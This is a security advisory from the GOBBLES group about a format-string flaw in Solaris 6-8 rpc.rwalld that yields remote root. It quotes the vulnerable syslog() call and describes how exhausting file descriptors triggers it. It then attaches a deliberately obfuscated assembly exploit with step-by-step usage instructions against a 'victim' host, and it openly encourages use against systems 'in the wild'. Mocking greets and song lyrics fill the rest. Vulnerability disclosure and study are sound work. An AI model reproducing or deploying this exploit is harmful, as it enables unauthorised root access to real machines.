xwall.s

`  
-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
GOBBLES SECURITY ADVISORY #32  
  
ALERT! REMOTE ROOT HOLE IN DEFAULT INSTALL OF POPULAR OPERATING SYSTEM! ALERT!  
  
Forward:  
<@route> so was fydor trying to make his code unreadable when he write nmap?  
<@route> or was that just the fallout of poor planning?  
<@route> this is awful  
<@route> if ( !victim || !sport || !dport || sd < 0) {  
<@route> fprintf(stderr, "send_udp_raw: One or more of your parameters  
suck!\n");  
<@route> free(packet);  
<@route> return -1;  
<@route> }  
<@route> This is the program that is used everywhere and written up in  
countless books?  
<@route> it's pretty much obscene that this program doesnt use libnet  
  
Systems Affected:  
Sun Solaris 6, Sun Solaris 7, Sun Solaris 8  
(sparc and x86 versions)  
  
  
Threat Level:  
Super duper high.  
  
  
Vendor Notification Status:  
Initial advisory sent to Sun Microsystems on Friday, April 5th.  
  
After long series of email exchange, Sun.com engineers finally begin working  
on developing patch for bug.  
  
Days later, CERT contact GOBBLES about bug. Dialouge happen then too with  
CERT. Both Sun Microsystems and CERT have promised to make sure that  
GOBBLES name is in both official advisories released. Hey, we do this for  
fame and attention, now that we are no longer weaned we must do something!  
  
Some time, full disclosure is real pain in ass. Everyone want more and more  
time to get things fixed before advisory is released. Time to grace lists  
with more GOBBLES Advisory.  
  
  
Exploit:  
A proof-of-concept exploit for this vulnerability has been attached to the  
bottom of this email. GOBBLES wrote it in way to keep unskilled from using  
it, like security assesment team from Vigilante who not able to tell if  
vulnerability is real or not in opensourced product after reading advisory.  
At the same time, skilled penetrators should not have any trouble using the  
code provided to exploit systems in the wild.  
  
Don't send GOBBLES email asking for other versions of exploit. Some things  
better left private and given to close friends for their own motivations.  
If you can't figure out how to work with this exploit and get remote root  
from what is provided in the advisory, really there is no reason for you to  
be using an exploit.  
  
  
A Few Words:  
There are some thing that GOBBLES have to say, some thing very heartfelt  
that he need to communicate to the world, some thing that best said in song,  
please take time to read lyric and understand what GOBBLES trying to say. . .  
  
"the sun has blessed  
the rays are gone  
and all the kids have left their tears and gone home,  
  
sweet 17, sour 29  
and i can't explain myself  
what i'd hoped to find  
you were all so kind  
when i was near,  
  
and if you're still feeling down  
then maybe you need me around  
to love and hold you  
don't say i hadn't told you so  
maybe you need me around,  
  
i had no luck  
i had no shame  
i had no cause  
just seventeen days of rain  
and you in my eyes,  
  
just one more song to slay this earth  
and i can't explain myself just what it's worth  
what was all i had  
but not all i'd need  
and i can't escape the fact that i still bleed,  
  
and if you're still feeling down  
and if this seems way too loud  
then maybe you need me around,  
  
i had no voice  
i had no drive  
i had no choice  
i've done my time  
had myself  
had my band  
i had my love  
had no hand in watching it all fall apart  
  
and if you're still feeling down  
then maybe you need me around  
to lift and scold you  
to send you crashing all right now  
maybe you need me around."  
  
- -Blissed and Gone, the Smashing Pumpkins  
  
  
Description of Problem (Part One):  
One of the default RPC services in Sun Solaris versions 6-8 is has an  
insecure syslog() statement, which allow remote attacker to execute custom  
code as root.  
  
Hehe, GOBBLES bet you getting pissed because in all this length of advisory,  
still no mention of what is vulnerable, hehehe, ;PPPPpppppppppppppppp. Keep  
control of temper, and keep reading, because you about to find out, hehehe  
GOBBLES is silly today.  
  
  
Remotely Exploitable:  
Yes.  
  
Locally Exploitable:  
Yes.  
  
Privilage Attained After Exploitation:  
Root.  
  
Exploit Included:  
As GOBBLES did mention previously, yes. It get you root. Girls will be  
impressed with mailing list reading skills and source code leeching  
technique utilized to gain remote root to Solaris machines. Included  
exploit for Sparc.  
  
  
Name of Vulnerable Service:  
$ grep rwall /etc/inetd.conf  
# The rwall server allows others to post messages to users on this machine.  
walld/1 tli rpc/datagram_v wait root /usr/lib/netsvc/rwall/rpc.rwalld rpc.rwalld  
  
It rwalld that vulnerable. It run as root. Attacker get root from  
exploiting it.  
  
  
Description of Problem (Part Two):  
Inside rwall_subr.c we see:  
  
/*  
* Make sure the wall programs exists, is executeable, and runs  
*/  
if (rval == -1 || (wall.st_mode & S_IXUSR) == 0 ||  
(fp = popen(WALL_PROG, "w")) == NULL) {  
syslog(LOG_NOTICE,  
"rwall message received but could not execute %s",  
WALL_PROG);  
syslog(LOG_NOTICE, msg);  
  
Bug easy enough to spot, but now question is, "GOBBLES, friend, how is  
this to be exploited? Faulty syslog() only called if rpc.rwalld can not  
execute /usr/sbin/wall on local system, which mean it only exploitable if  
admin have chmod -x or rm /usr/sbin/wall or something like this, right, so  
why this so such a big deal?"  
  
To this GOBBLES say, "Friend IDIOT, faulty syslog() is called if anything is  
to make popen() fail, there one other way to exploit bug, which make it  
dangerous and affect all installation of Solaris running rpc.rwalld, is that  
popen() to fail if there no available file descriptors on system."  
  
This easier to exploit locally on system. For remote exploitation, timing  
is important and thus is race condition. Each new tcp session to running  
service on target host will consume filedescriptor. Then run attached  
exploit to have root handed over, like operator status given to route in  
#phrack with no question ask.  
  
  
Patch Available:  
Fucked if GOBBLES knows.  
  
  
Suggested Workaround:  
GOBBLES suggest that admin disable rwalld from /etc/inetd.conf until patch  
made available, then restart it, if you wait until patch available until  
upgrade you probably have to do upgrade by reinstalling operating system,  
because now exploit out and probably in hands of less than ethical  
penetrator looking to abuse you in one way or another.  
  
  
Security Candy:  
  
- -begin copy-  
  
/*  
Remote Root Exploit for Solaris 6-8 rpc.walld  
  
Usage Instructions:  
1. Compile.  
gcc -o xwall xwall.s  
2. Run.  
(./xwall ; ./shellcode) | rwall victim  
3. Late Easter egg.  
strings xwall  
  
Note(s):  
Something else must be done to consume FD's on  
victim system. Figure this one out for self.  
  
This exploit written to be run on Linux. Supplied  
format string is for Sparc Solaris. Provide own  
remote shellcode and use as above described.  
  
Love,  
GOBBLES Security  
http://www.bugtraq.org  
[email protected]  
*/  
  
  
retloc:  
long 0x41424344  
retaddr:  
long 0x60bb135  
padding:  
long 4  
walkcount:  
long 1  
globl main  
type main,@function  
main:  
pusha  
movl (padding),%ecx  
jusfhds7fg:  
pushl %ecx  
movl $4,%eax  
movl $1,%ebx  
pushl $0x00000041  
movl %esp,%ecx  
movl $1,%edx  
int $0x80  
popl %ecx  
popl %ecx  
loop jusfhds7fg  
movl %esp,24(%esp)  
pushl $0x42424242  
movl $4,%edx  
movl %esp,%ecx  
movl $1,%ebx  
movl $4,%eax  
int $0x80  
movl (retloc),%eax  
bswapl %eax  
pushl %eax  
subl $4,%ecx  
movl %edx,%eax  
int $0x80  
addl $4,%ecx  
movl %edx,%eax  
int $0x80  
subl $4,%ecx  
popl %eax  
bswapl %eax  
incl %eax  
incl %eax  
bswapl %eax  
pushl %eax  
movl %edx,%eax  
int $0x80  
popl %eax  
movl %esp,%edx  
incl %edx  
xorl %esi,101(%ebp)  
andb %al,111(%edx)  
popa  
pushl %edx  
andb %al,97(%ebx)  
decl %esi  
aaa  
andb %al,111(%ebx)  
incl %esp  
xorl (%ecx),%eax  
movl (walkcount),%ecx  
cmpl $0,%ecx  
je nczxhczjcg89zg89  
pushl %ecx  
movl $4,%edx  
movl $1,%ebx  
pushl $0x78382e25  
cmzxnczxcz8c:  
pushl %ecx  
movl %esp,%ecx  
addl $4,%ecx  
movl $4,%eax  
int $0x80  
popl %ecx  
loop cmzxnczxcz8c  
popl %ecx  
popl %ecx  
nczxhczjcg89zg89:  
movl (retaddr),%edx  
pushl %edx  
shr $16,%edx  
subl %edx,(%esp)  
movw $0,2(%esp)  
pushl %edx  
shll $3,%ecx  
subl %ecx,(%esp)  
movl (padding),%edx  
subl %edx,(%esp)  
subl $16,(%esp)  
movw $0,2(%esp)  
pushl $cznxczxczxh8  
call printf  
movl $1,%eax  
int $0x80  
cznxczxczxh8:  
string "%%%uc%%hn%%%uc%%hn\n"  
  
- -begin paste-  
  
  
Greets:  
route, because route deserves attention, use libnet it rulez. route, why  
you refuse GOBBLES interview on supposed intrusion on @stake subnet that was  
allowed when some malicious local user ran trojaned blackhat warez? GOBBLES  
need to confirm with you if this really did happen, please respond soon...  
  
[email protected], the Official Sysadmin Mascot of GOBBLES Security. Thanks for  
letting GOBBLES know to cut out the "leet gr33tz" from advisory, now people  
hold lots of respect for GOBBLES. Thanks Tracy, you're a peach. Next  
advisory will be disclosure of 0day CSS holes in mp3.com's website...  
  
w00w00 Security Development, publishing advisories at the blinding speed of  
1 per 3 years, and still being the largest active nonprofit security group in  
the world, to the eyes of the public. Disclosure is good when it serve a  
political agenda, hehehehe...  
  
The Securityfocus Staff, who often reject the legitimate research materials  
of GOBBLES from their lists, but make sure they archive it on their website  
anyways. Thanks for at least giving us some of the credit that we deserve.  
In the future, though, if our submissions don't meet your requirements for  
publication on the lists, don't put them on your website. Enough of this  
double standards bullshit.  
  
zen-parse, for defining what a whitehat is -- no skill, no ethic, no respect.  
  
and finally, the beautiful Jennifer Garner, who play Sydney Bristow in tv  
show Alias, who many member of GOBBLES Security is in love with. You win free  
GOBBLES Security tshirt, come to defcon in August to get it, hehehehehehe!  
  
  
  
  
Hush provide the worlds most secure, easy to use online applications - which solution is right for you?  
HushMail Secure Email http://www.hushmail.com/  
HushDrive Secure Online Storage http://www.hushmail.com/hushdrive/  
Hush Business - security for your Business http://www.hush.com/  
Hush Enterprise - Secure Solutions for your Enterprise http://www.hush.com/  
  
Looking for a good deal on a domain name? http://www.hush.com/partners/offers.cgi?id=domainpeople  
  
-----BEGIN PGP SIGNATURE-----  
Version: Hush 2.1  
Note: This signature can be verified at https://www.hushtools.com  
  
wlwEARECABwFAjzOnwwVHGdvYmJsZXNAaHVzaG1haWwuY29tAAoJEBzRp5chmbAPt4sA  
n0+78j2dzLIufxrdL5A8GcqG/ZPnAKCAnpQVJKw3PYNFN9fFjEfBcGCruQ==  
=jCTV  
-----END PGP SIGNATURE-----  
  
`